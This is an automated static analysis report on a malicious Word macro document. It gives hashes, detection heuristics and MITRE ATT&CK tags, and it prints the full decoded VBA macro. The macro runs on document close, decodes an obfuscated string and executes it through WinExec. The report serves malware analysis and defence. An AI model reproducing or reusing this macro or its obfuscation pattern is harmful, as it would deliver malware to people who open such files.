Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 eafc44e91530127b…

MALICIOUS

Office (OOXML)

44.6 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-02-04
MD5: 9845ccaaf3c4fe109bda24adc6b93dbf SHA-1: d229149bc19716ec4edaf3be9929706116953cc0 SHA-256: eafc44e91530127b5ac46763dc14015963b77c2c52846ec7da42c50ecbaabb54
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML document containing VBA macros, as indicated by the 'OOXML_VBA' heuristic and the presence of 'macros.bas' and 'vbaProject_00.bin'. The VBA code includes a function 'rischio' that takes a string argument and calls 'orefice', and a subroutine 'flemma' that calls 'rischio' with a constructed string derived from 'privato()'. This suggests the macro is designed to execute arbitrary commands, likely downloading and running a second-stage payload. The ClamAV detection further confirms its malicious nature. The specific family is not identifiable from the provided evidence.

Heuristics 3

  • ClamAV: Doc.Malware.Xenon-10059125-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Xenon-10059125-0
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4931 bytes
SHA-256: 53e5246eb7222a476fdd060ed72f4d24906eca2eaced55cce3d4baa937e26c34
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If Win64 Then
Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#ElseIf Win32 Then
Private Declare Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#End If

Public Function rischio(esaudire As String)
  esaudire = Replace(esaudire, "", "")
  Call orefice(esaudire)
End Function

Public Sub flemma()
  Dim erba As String
  Dim fanale As String
  erba = "DCED"
  fanale = privato()


  Dim pitone As String
  pitone = Trim("")

  Dim nebulosa As Integer
  nebulosa = Len("giove")

  Dim merlo As String
  merlo = tricheco(fanale, erba)
  If nebulosa <> (0 + 1) Then
    Application.Run "rischio", merlo
  End If
End Sub


Public Function gallina(urgenza As Integer, pepita As Integer) As Integer
  gallina = Int(urgenza - pepita - 1)
End Function

Public Function buca(snellire As String, indagine As Integer) As String
   Dim simulato As Integer
   Dim pendice As String
   pendice = snellire
   
   Dim botanico As Integer
   botanico = 0
   
   For simulato = (LenB(snellire) / 2) To indagine - 1
     If botanico = (LenB(snellire) / 2) Then
       botanico = 0
     End If
     
     pendice = pendice & Mid(snellire, botanico + 1, 1)
     
     botanico = botanico + 1
   Next
   
   buca = pendice
End Function


Public Function atavico(registro As String)
  Dim consumo As String
  Dim parcella As Integer
  consumo = "ABCDE"
  
  Dim currentregistro As String

  For parcella = 1 To 5
    currentregistro = Mid(consumo, parcella, 1)
    If currentregistro = RTrim(registro) Then
       atavico = parcella - 1
    End If
    
  Next
  
End Function

Private Sub Document_Close()
  If 2 = (1 + 1) Then
    Application.Run "flemma"
  End If
End Sub

Public Function tricheco(sbuffare As String, pianta As String) As String
  
  Dim sonda As Integer
  Dim truccato As Integer

  Dim mordere As String
  mordere = buca(pianta, Len(sbuffare))

  pianta = mordere

  Dim venato

  Dim elsa As String
  elsa = ""
  
  Dim trachea As String
  Dim insonnia As String
  For venato = 1 To (LenB(sbuffare) / 2)

    insonnia = Mid(pianta, venato, 1)
    sonda = atavico(insonnia)
    trachea = Mid(sbuffare, venato, 1)

    truccato = Asc(trachea)

    Dim slogatura As Integer
    slogatura = gallina(truccato, sonda)

    elsa = Chr(slogatura) + elsa + RTrim("")
    
  Next
  
  tricheco = elsa
  
End Function

Public Function orefice(vivanda As String)
  Dim esaudire As String
  esaudire = tricheco("gpi3izg", "DCEEDBBD")

  Dim monastero As Integer
 
  If Len(ActiveDocument.Content.Text) <> 2 Then
    monastero = WinExec(StrReverse(vivanda + " " + esaudire), Len(""))
  End If
End Function


Public Function privato()
  Dim caduco As String

  caduco = "3f%tszjvwkjpp#2rss%1"

  caduco = caduco + "I{jg$E~tevx$1Ftqqdsh"
  caduco = caduco + "$+Si{0Tfnhhx$V~wxhr2"
  caduco = caduco + "Rhy2[hgGpljrx,3Hszsp"
  caduco = caduco + "sdiJmoj,+kyxt=43hrf{"

  caduco = caduco + "rgf~~} {2ftq3onpy2}g"


  caduco = caduco + "|f3fen,0$'jrz=FTTGFX"
  caduco = caduco + "E#0$+_X^WL3i|h,-?#Xx"
  caduco = caduco + "euy1Tutgivx$(hsz>DUT"


  caduco = caduco + "HDYE+_X^WL3i|h,?,Qj{"
  caduco = caduco + "1Rgnify$W|xxip3Riw3["
  caduco = caduco + "ieHpmhsx-1Is{qqsegXx"


  caduco = caduco + "vlsk,*mxxs?33gte{qie"
  caduco = caduco + "~} ~{1hsq2x2tkuCmgB|"
  caduco = caduco + "g{h+->"


  privato = caduco

End Function

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C811796E-C44D-420B-8914-A6429A7BC0CA}{D8BEC7BE-3F1E-4782-8AB0-B30430AD8A6A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E53F80C3-7E4C-4BEE-9847-9D5D6F5162C8}{2EBD0471-B40B-44CC-9643-4B7F00223577}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27648 bytes
SHA-256: c3b26e3bc9b9da1d576fcb25e1575756b92d88713247387e12aa522b9d9febaf
Detection
ClamAV: Doc.Malware.Xenon-10059125-0
Obfuscation or payload: unlikely